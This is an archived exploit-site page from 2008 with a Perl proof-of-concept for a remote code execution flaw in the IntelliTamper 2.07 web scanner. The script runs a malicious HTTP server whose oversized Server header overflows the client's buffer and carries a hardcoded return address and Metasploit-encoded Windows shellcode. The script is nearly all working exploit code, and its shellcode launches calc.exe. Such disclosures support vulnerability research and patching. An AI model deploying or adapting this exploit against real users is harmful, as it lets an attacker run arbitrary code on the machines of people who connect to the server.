Home / exploits intellitamper207-exec.txt
Posted on 23 July 2008
#!/usr/bin/perl # # IntelliTamper 2.07 Remote Code Execution ( server header ) # # By: Koshi # # Guido Landi finally did it, thought i'd throw one in there. # This example assumes you're scanning "http://127.0.0.1" # For example, exploit may not work if you were to scan "http://127.0.0.1:80" # or even changing it as slightly as "http://127.0.0.1/" # # gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU, # and finally, Guido Landi for sparking my interest in exploiting # this application. # # use IO::Socket; my $msg=""; my $overflow = "A"x1536; my $fun = "". "xb3x8dx95x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL) "z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer. "AAAA2Cb3Cb4CBBBB"; # Starts executing here # win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com my $sh3llcode = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49". "x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax63". "x58x30x42x31x50x42x41x6bx41x41x73x41x32x41x41x32". "x42x41x30x42x41x58x38x41x42x50x75x4bx59x59x6cx6a". "x48x70x44x35x50x65x50x73x30x6ex6bx33x75x75x6cx4c". "x4bx71x6cx53x35x74x38x55x51x78x6fx6ex6bx62x6fx36". "x78x6cx4bx53x6fx65x70x36x61x6ax4bx43x79x6ex6bx76". "x54x4ex6bx53x31x68x6ex64x71x6fx30x5ax39x4ex4cx6e". "x64x6fx30x71x64x75x57x78x41x38x4ax74x4dx76x61x4f". "x32x5ax4bx39x64x75x6bx43x64x67x54x74x44x74x35x48". "x65x6cx4bx73x6fx37x54x57x71x38x6bx70x66x6ex6bx64". "x4cx70x4bx4ex6bx33x6fx35x4cx64x41x38x6bx4cx4bx37". "x6cx4cx4bx76x61x58x6bx6cx49x43x6cx55x74x56x64x4f". "x33x44x71x4fx30x30x64x6cx4bx77x30x74x70x6fx75x49". "x50x50x78x36x6cx4cx4bx33x70x54x4cx6ex6bx30x70x45". "x4cx6ex4dx4cx4bx55x38x43x38x78x6bx44x49x6ex6bx4b". "x30x6cx70x45x50x65x50x75x50x4cx4bx41x78x75x6cx51". "x4fx30x31x7ax56x51x70x30x56x4fx79x38x78x6cx43x6b". "x70x71x6bx72x70x61x78x4ax50x4dx5ax43x34x43x6fx43". "x58x4cx58x49x6ex6cx4ax66x6ex43x67x69x6fx48x67x43". "x53x73x51x50x6cx41x73x66x4ex70x65x72x58x71x75x37". "x70x63"; my $overflow2 = "A"x1046; my $buff = "$overflow$fun$sh3llcode"; my $resp = "". "HTTP/1.1 200 OK ". "Connection: close ". "Content-Length: 8 ". "Date: Mon, 21 Jul 2008 20:47:05 GMT ". "Content-Type: text/plain ". "Server: $buff ". "MIME-Version: 1.0 ". "Exploit! "; my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, ); print "Listening on port 80 for connections... "; my $new_sock = $sock->accept(); print "Got connection from client... "; my $sock_addr = recv($new_sock,$msg,190,0); print "Sending client packet... "; print $new_sock "$resp"; print "Packet sent to client, voila? "; close($sock); print "Socket closed ";
